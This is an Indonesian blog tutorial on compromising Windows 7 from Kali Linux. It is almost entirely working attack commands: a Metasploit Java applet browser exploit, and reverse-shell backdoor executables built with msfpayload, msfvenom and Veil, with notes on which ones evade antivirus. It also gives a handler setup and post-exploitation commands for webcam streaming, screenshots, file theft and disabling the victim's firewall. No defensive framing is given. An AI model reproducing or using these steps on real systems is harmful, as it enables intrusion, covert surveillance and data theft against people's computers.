Saturday, 17 February 2018

Exploit Windows Menggunakan Kali Linux

Sebelum melulai exploit


Jalankan service metasploit

- Applications => Kali Linux => System services => Metasploit => Comunity /  pro start


Untuk menjalankan Metasploit freamwork

- Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork


Menjalankan metasploit melalui terminal

- bukan terminal ketik msfconsole


 



 Exploit windows mengunakan java applet

- ketik: use exploit/multi/browser/java_jre17_provider_skeleton

  Tekan enter

- ketik: set payload java/Meterpreter/reverse_tcp

  Tekan enter

- ketik: set lhost (ketik ip komputer yang kamu gunakan)

  Tekan enter

- ketik: set srvhost (ketik ip kamputer yang kamu gunakan)

  Tekan enter

- ketik: set uripath /

  Tekan enter

- exploit tekan enter


Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/

Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/



Sudah berhasil masuk ke os windows7


Exploit windows menggunakan Backdoor

Banyak cara untuk membuat backdoor

Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.


Menggunakan msfpayload

- buka terminal kemudian ketik kode di bawah ini: msfpayload

  windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x > /root/JanganDibuka.exe

Ket:

       Lhost = ip komputer yang kamu gunakan

       Lport = isi dengan port 4444

       /root = letak backdoor yang sudah jadi

       Jangan Dibuka = filenema backdoor yang akan di buat



Menggunakan msfvenom

- buka teminal ketik kode di bawah ini:

  msfvenom -p windows/meterpreter/reverse_tcp

- o



Ketik di bawah ini untuk membuat backdoor

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00'

lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe


Menggunakan veil

Sebelum menggunakan veil

Install dulu tool veil

- buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archiv /master.zip

- Kemudian extrak menggunakan perintah unzip master.zip

- install veil: /root/Veil-Evasion-master/setup/setup.sh


Membuat backdoor

- masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py

- ketik use


Ketik 25


Ketik generate


Ketik 1



Tekan enter


ketik ip komputer yang kamu gunakan

Ketik port 4444


Tekan enter


Ketik nama backdoor yang akan dibuat


Ketik 1



Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe


Di atas sudah ada beberapa contoh membuat backdoor

Kalau menggunakan backdoor :

- msfpayload = mudah terdeteksi antivirus

- msfvenom = bisa lolos dari antivirus

- veil = bisa lolos dari antivirus


Menggunakan Backdoor

- buka terminal ketik:

Msfconsole

Ketik : use exploit/multi/handler

Tekan enter

Ketik :

set payload windows/meterpreter/reverse_tcp

Tekan enter

Ketik : set lhost (ip komputer yang kamu gunakan)

Tekan enter

Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat)

Tekan enter

Ketik : exploit

Tekan enter


Copy dan jalankan backdoor di komputer korban



Berhasil masuk ke windows7


Ketik help : mengetahui perintah meterpreter



Ketik shell untuk masuk cmd windows7



Ketik exit : keluar dari cmd

Ketik screenshot : sreenshot windows7

Ketik webcam_stream : menjalankan webcam komputer korban



Ketik run vnc : remote komputer korban






Untuk mengambil file dari komputer korban

Ketik download \\ lokasi file korban

Contoh: download c:\\wallpaper.jpg




Untuk menaruh file ke komputer korban

Ketik upload \\ file yang akan ditaruh di komputer korban

Contoh: upload gambar.jpg c:\\



Untuk disable firewall windows

Ketik: netsh firewall set opmode disable



Share :